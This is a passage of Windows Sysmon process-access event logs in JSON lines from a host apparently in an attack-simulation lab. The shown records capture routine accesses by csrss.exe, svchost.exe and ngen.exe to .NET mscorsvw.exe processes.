08:05:22.648","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101F2B0C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.648\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101F2B0C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.648","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101F2B0C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.695\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010922E0C00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.695","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010922E0C00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.695\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010922E0C00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.695","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010922E0C00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010922E0C00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010922E0C00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.945\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001029330C00}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.945","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001029330C00}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.945\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001029330C00}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.945","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001029330C00}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.960\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001029330C00}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.960","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001029330C00}","TargetProcessId":"4956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-00101F370C00}\r\nTargetProcessId: 3664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsv